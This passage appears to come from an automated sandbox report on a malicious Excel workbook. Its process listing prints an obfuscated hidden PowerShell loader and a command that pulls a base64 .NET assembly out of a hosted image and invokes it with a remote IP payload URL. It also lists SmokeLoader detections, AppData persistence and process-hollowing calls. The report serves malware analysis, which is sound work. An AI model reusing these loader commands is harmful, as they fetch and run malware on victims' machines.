? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?r? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C4? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?UwB1? ? ? ? ?GI? ? ? ? ?cwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?EM? ? ? ? ?bwBu? ? ? ? ?HY? ? ? ? ?ZQBy? ? ? ? ?HQ? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?RgBy? ? ? ? ?G8? ? ? ? ?bQBC? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FI? ? ? ? ?ZQBm? ? ? ? ?Gw? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?aQBv? ? ? ? ?G4? ? ? ? ?LgBB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?T? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?bgBs? ? ? ? ?Gk? ? ? ? ?Yg? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?Tw? ? ? ? ?u? ? ? ? ?Eg? ? ? ? ?bwBt? ? ? ? ?GU? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bt? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BN? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?VgBB? ? ? ? ?Ek? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?HY? ? ? ? ?bwBr? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?G4? ? ? ? ?dQBs? ? ? ? ?Gw? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?bwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?WwBd? ? ? ? ?F0? ? ? ? ?I? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?d? ? ? ? ?B4? ? ? ? ?HQ? ? ? ? ?LgBW? ? ? ? ?EY? ? ? ? ?RQBX? ? ? ? ?C8? ? ? ? ?M? ? ? ? ?? ? ? ? ?5? ? ? ? ?C8? ? ? ? ?Ng? ? ? ? ?x? ? ? ? ?C4? ? ? ? ?O? ? ? ? ?? ? ? ? ?0? ? ? ? ?DE? ? ? ? ?Lg? ? ? ? ?0? ? ? ? ?Dk? ? ? ? ?Lg? ? ? ? ?z? ? ? ? ?DI? ? ? ? ?Lw? ? ? ? ?v? ? ? ? ?Do? ? ? ? ?c? ? ? ? ?B0? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?YQB0? ? ? ? ?Gk? ? ? ? ?dgBh? ? ? ? ?GQ? ? ? ? ?bw? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?YQB0? ? ? ? ?Gk? ? ? ? ?dgBh? ? ? ? ?GQ? ? ? ? ?bw? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?YQB0? ? ? ? ?Gk? ? ? ? ?dgBh? ? ? ? ?GQ? ? ? ? ?bw? ? ? ? ?n? ? ? ? ?Cw? ? ? ? ?JwBS? ? ? ? ?GU? ? ? ? ?ZwBB? ? ? ? ?HM? ? ? ? ?bQ? ? ? ? ?n? ? ? ? ?Cw? ? ? ? ?Jw? ? ? ? ?n? ? ? ? ?Ck? ? ? ? ?KQ? ? ? ? ?=';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                      Imagebase:0xf0000
                                                      File size:427'008 bytes
                                                      MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:13
                                                      Start time:09:51:15
                                                      Start date:31/08/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                                                      Imagebase:0xf0000
                                                      File size:427'008 bytes
                                                      MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:14
                                                      Start time:09:51:20
                                                      Start date:31/08/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                      Imagebase:0x13c0000
                                                      File size:64'704 bytes
                                                      MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000E.00000002.465506126.0000000000131000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000E.00000002.465506126.0000000000131000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000E.00000002.465492462.0000000000110000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000E.00000002.465492462.0000000000110000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:15
                                                      Start time:09:51:26
                                                      Start date:31/08/2024
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\Explorer.EXE
                                                      Imagebase:0xff2f0000
                                                      File size:3'229'696 bytes
                                                      MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:16
                                                      Start time:09:51:42
                                                      Start date:31/08/2024
                                                      Path:C:\Windows\System32\taskeng.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:taskeng.exe {4EEBF1C0-00CF-4920-A83B-C678B0B7FDEB} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                                                      Imagebase:0xff6a0000
                                                      File size:464'384 bytes
                                                      MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:17
                                                      Start time:09:51:42
                                                      Start date:31/08/2024
                                                      Path:C:\Users\user\AppData\Roaming\dagifhd
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Roaming\dagifhd
                                                      Imagebase:0x1080000
                                                      File size:64'704 bytes
                                                      MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 0%, ReversingLabs
                                                      • Detection: 0%, Virustotal, Browse
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:19
                                                      Start time:09:51:44
                                                      Start date:31/08/2024
                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                      Imagebase:0xa20000
                                                      File size:2'972'672 bytes
                                                      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:20
                                                      Start time:09:51:45
                                                      Start date:31/08/2024
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\explorer.exe
                                                      Imagebase:0xff2f0000
                                                      File size:3'229'696 bytes
                                                      MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:21
                                                      Start time:09:51:46
                                                      Start date:31/08/2024
                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                      Imagebase:0xa20000
                                                      File size:2'972'672 bytes
                                                      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:22
                                                      Start time:09:51:48
                                                      Start date:31/08/2024
                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                      Imagebase:0xa20000
                                                      File size:2'972'672 bytes
                                                      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:23
                                                      Start time:09:51:49
                                                      Start date:31/08/2024
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\explorer.exe
                                                      Imagebase:0xff2f0000
                                                      File size:3'229'696 bytes
                                                      MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:24
                                                      Start time:09:51:50
                                                      Start date:31/08/2024
                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                      Imagebase:0xa20000
                                                      File size:2'972'672 bytes
                                                      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000018.00000002.624562416.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      Has exited:false

                                                      Target ID:25
                                                      Start time:09:51:51
                                                      Start date:31/08/2024
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\explorer.exe
                                                      Imagebase:0xff2f0000
                                                      File size:3'229'696 bytes
                                                      MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000019.00000002.624527841.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      Has exited:false

                                                      Target ID:26
                                                      Start time:09:51:52
                                                      Start date:31/08/2024
                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                      Imagebase:0xa20000
                                                      File size:2'972'672 bytes
                                                      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:27
                                                      Start time:09:51:53
                                                      Start date:31/08/2024
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\explorer.exe
                                                      Imagebase:0xff2f0000
                                                      File size:3'229'696 bytes
                                                      MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Call Graph

                                                      • Entrypoint
                                                      • Decryption Function
                                                      • Executed
                                                      • Not Executed
                                                      • Show Help
                                                      callgraph 1 Error: Graph is empty

                                                      Module: Sheet1

                                                      Declaration
                                                      LineContent
                                                      1

                                                      Attribute VB_Name = "Sheet1"

                                                      2

                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                      3

                                                      Attribute VB_GlobalNameSpace = False

                                                      4

                                                      Attribute VB_Creatable = False

                                                      5

                                                      Attribute VB_PredeclaredId = True

                                                      6

                                                      Attribute VB_Exposed = True

                                                      7

                                                      Attribute VB_TemplateDerived = False

                                                      8

                                                      Attribute VB_Customizable = True

                                                      Module: Sheet2

                                                      Declaration
                                                      LineContent
                                                      1

                                                      Attribute VB_Name = "Sheet2"

                                                      2

                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                      3

                                                      Attribute VB_GlobalNameSpace = False

                                                      4

                                                      Attribute VB_Creatable = False

                                                      5

                                                      Attribute VB_PredeclaredId = True

                                                      6

                                                      Attribute VB_Exposed = True

                                                      7

                                                      Attribute VB_TemplateDerived = False

                                                      8

                                                      Attribute VB_Customizable = True

                                                      Module: Sheet3

                                                      Declaration
                                                      LineContent
                                                      1

                                                      Attribute VB_Name = "Sheet3"

                                                      2

                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                      3

                                                      Attribute VB_GlobalNameSpace = False

                                                      4

                                                      Attribute VB_Creatable = False

                                                      5

                                                      Attribute VB_PredeclaredId = True

                                                      6

                                                      Attribute VB_Exposed = True

                                                      7

                                                      Attribute VB_TemplateDerived = False

                                                      8

                                                      Attribute VB_Customizable = True

                                                      Module: ThisWorkbook

                                                      Declaration
                                                      LineContent
                                                      1

                                                      Attribute VB_Name = "ThisWorkbook"

                                                      2

                                                      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                      3

                                                      Attribute VB_GlobalNameSpace = False

                                                      4

                                                      Attribute VB_Creatable = False

                                                      5

                                                      Attribute VB_PredeclaredId = True

                                                      6

                                                      Attribute VB_Exposed = True

                                                      7

                                                      Attribute VB_TemplateDerived = False

                                                      8

                                                      Attribute VB_Customizable = True

                                                      Reset < >
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.456810896.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_16d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 87a294defd21b33167862cd80b94f4f4ba6b93f2d838b5825c9e93f79a79430b
                                                        • Instruction ID: 555807621c49832913412bf0a6eadf928a869a5ef3b5fed1801ed433bd81341b
                                                        • Opcode Fuzzy Hash: 87a294defd21b33167862cd80b94f4f4ba6b93f2d838b5825c9e93f79a79430b
                                                        • Instruction Fuzzy Hash: F2012B31A04340AAEB205E16ECC4767FF98DF81364F28C05AFC450F182C3799945CAB1
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.456810896.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_16d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 13324d03f2630c8366d8b5b404660f2ef606341924ce66049d40ddd4b5e109e0
                                                        • Instruction ID: aa40a768388a59dcc9f38af461485e3089651d3dc9e42b8c51fd1635dfba9db9
                                                        • Opcode Fuzzy Hash: 13324d03f2630c8366d8b5b404660f2ef606341924ce66049d40ddd4b5e109e0
                                                        • Instruction Fuzzy Hash: 9001526150D3C05FD7124B259C94B52BFB4DF43224F1981DBE8848F1A3C2699C48C772

                                                        Execution Graph

                                                        Execution Coverage:7.4%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:65.2%
                                                        Total number of Nodes:23
                                                        Total number of Limit Nodes:2
                                                        execution_graph 4819 304b48 4820 304b6f 4819->4820 4823 304c98 4820->4823 4824 304cc2 4823->4824 4825 304c84 4824->4825 4827 304d60 4824->4827 4828 304d93 4827->4828 4843 30172c 4828->4843 4830 304f5c 4831 301738 Wow64SetThreadContext 4830->4831 4832 30505b 4830->4832 4831->4832 4833 301774 WriteProcessMemory 4832->4833 4837 305384 4833->4837 4834 305623 4835 301774 WriteProcessMemory 4834->4835 4836 305674 4835->4836 4838 301780 Wow64SetThreadContext 4836->4838 4839 305777 4836->4839 4837->4834 4840 301774 WriteProcessMemory 4837->4840 4838->4839 4841 301798 ResumeThread 4839->4841 4840->4837 4842 305829 4841->4842 4842->4824 4844 305938 CreateProcessW 4843->4844 4846 305b2c 4844->4846 4846->4846

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 337 304d60-304d91 338 304d93 337->338 339 304d98-304ece 337->339 338->339 344 304ed0 339->344 345 304ed5-304f0a 339->345 344->345 347 304f37-304f7c call 30172c 345->347 348 304f0c-304f36 345->348 352 304fa5-304fcb 347->352 353 304f7e-304f9a 347->353 348->347 356 304fd2-305014 352->356 357 304fcd 352->357 353->352 361 305016 356->361 362 30501b-305047 356->362 357->356 361->362 364 3050a8-3050d9 call 301744 362->364 365 305049-30507b call 301738 362->365 372 305102-30510c 364->372 373 3050db-3050f7 364->373 370 3050a4-3050a6 365->370 371 30507d-305099 365->371 370->372 371->370 374 305113-305136 372->374 375 30510e 372->375 373->372 377 305138 374->377 378 30513d-305181 call 301750 374->378 375->374 377->378 384 305183-30519f 378->384 385 3051aa-3051b3 378->385 384->385 386 3051b5-3051dd call 30175c 385->386 387 3051df-3051e1 385->387 389 3051e7-3051fb 386->389 387->389 392 305224-30522e 389->392 393 3051fd-305219 389->393 394 305230 392->394 395 305235-305259 392->395 393->392 394->395 399 305260-3052b2 call 301768 395->399 400 30525b 395->400 405 3052b4-3052c8 399->405 406 3052ca-3052cc 399->406 400->399 407 3052d2-3052e6 405->407 406->407 408 305323-30533d 407->408 409 3052e8-305322 call 301768 407->409 410 305366-3053a4 call 301774 408->410 411 30533f-30535b 408->411 409->408 417 3053a6-3053c2 410->417 418 3053cd-3053d7 410->418 411->410 417->418 419 3053d9 418->419 420 3053de-3053ee 418->420 419->420 422 3053f0 420->422 423 3053f5-30541d 420->423 422->423 427 305424-305433 423->427 428 30541f 423->428 429 3055fe-30561d 427->429 428->427 430 305623-30564a 429->430 431 305438-305446 429->431 436 305651-305694 call 301774 430->436 437 30564c 430->437 432 305448 431->432 433 30544d-305474 431->433 432->433 439 305476 433->439 440 30547b-3054a2 433->440 442 305696-3056b2 436->442 443 3056bd-3056c7 436->443 437->436 439->440 445 3054a4 440->445 446 3054a9-3054dd 440->446 442->443 447 3056c9 443->447 448 3056ce-3056fb 443->448 445->446 453 3054e3-3054f1 446->453 454 3055c9-3055d6 446->454 447->448 455 305708-305714 448->455 456 3056fd-305707 448->456 461 3054f3 453->461 462 3054f8-3054ff 453->462 459 3055d8 454->459 460 3055dd-3055f1 454->460 457 305716 455->457 458 30571b-30572b 455->458 456->455 457->458 463 305732-305763 458->463 464 30572d 458->464 459->460 465 3055f3 460->465 466 3055f8 460->466 461->462 467 305501 462->467 468 305506-30554e 462->468 471 3057c4-3057f5 call 30178c 463->471 472 305765-305772 call 301780 463->472 464->463 465->466 466->429 467->468 477 305550 468->477 478 305555-30557a call 301774 468->478 480 3057f7-305813 471->480 481 30581e-305824 call 301798 471->481 479 305777-305797 472->479 477->478 485 30557f-30559f 478->485 483 3057c0-3057c2 479->483 484 305799-3057b5 479->484 480->481 490 305829-305849 481->490 483->481 484->483 488 3055a1-3055bd 485->488 489 3055c8 485->489 488->489 489->454 492 305872-305915 490->492 493 30584b-305867 490->493 493->492
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.453825567.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_300000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ContextMemoryProcessThreadWow64Write
                                                        • String ID:
                                                        • API String ID: 3696009080-0
                                                        • Opcode ID: 285c2cba1e5d9284b0412d0d10ec9eb74c6b69327fa2bfcd8f663e59da960f32
                                                        • Instruction ID: 62fa8a53e8618c45e2c56bb16dd7908c3f40f74182913a9d8f57187ce054ba38
                                                        • Opcode Fuzzy Hash: 285c2cba1e5d9284b0412d0d10ec9eb74c6b69327fa2bfcd8f663e59da960f32
                                                        • Instruction Fuzzy Hash: FF62D174E012288FEB65DF25C854BEEBBB2AB89301F5081EAD40DA7291DB345E85DF50

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
